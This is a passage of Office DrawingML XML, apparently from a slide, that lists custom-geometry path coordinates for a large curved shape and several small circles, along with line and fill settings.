                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153575" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3171513" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188255" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203780" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218068" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231096" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242844" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253290" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3262412" y="1473200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270189" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3276600" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281624" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285239" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287424" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288156" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287424" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285239" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281624" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3276600" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270189" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3262412" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253290" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242844" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231096" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218068" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203780" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188255" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3171513" y="2336800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153575" y="2374900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134464" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114200" y="2463800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092805" y="2501900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070301" y="2540000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3046708" y="2578100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022048" y="2616200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996343" y="2654300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969613" y="2679700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941880" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913166" y="2755900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883492" y="2794000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852879" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821349" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788922" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755621" y="2908300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721466" y="2946400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686480" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650683" y="2997200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614097" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576743" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538643" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499817" y="3086100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2460288" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420076" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379204" y="3149600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337691" y="3175000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2252834" y="3200400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030992" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985132" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938825" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1892092" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844955" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593880" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2633076" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2671632" y="3238500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709532" y="3213100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746757" y="3187700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783293" y="3162300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819122" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854228" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2888594" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922203" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955040" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987087" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018328" y="2959100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048746" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078325" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107048" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134899" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3161861" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187917" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213050" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237245" y="2667000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260485" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282752" y="2590800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3304031" y="2552700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324305" y="2514600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343557" y="2476500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361771" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378930" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395017" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410017" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423911" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3436685" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448320" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3458802" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468112" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476235" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483153" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488851" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493312" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496518" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498454" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3499104" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498454" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496518" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493312" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488851" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483153" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476235" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468112" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3458802" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448320" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3436685" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423911" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410017" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395017" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378930" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361771" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343557" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324305" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3304031" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282752" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260485" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237245" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213050" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187917" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3161861" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134899" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107048" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078325" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048746" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018328" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987087" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955040" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922203" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2888594" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854228" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819122" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783293" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746757" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709532" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2671632" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2633076" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593880" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1987188" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511915" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465496" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033607" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987188" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1893192" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1605911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558725" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940378" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893192" y="0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797768" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679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797768" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="324772" y="54770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="DDEAF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797768" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679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797768" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="54770" y="54957"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FFF1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127964" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679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127964" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="54770" y="325975"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
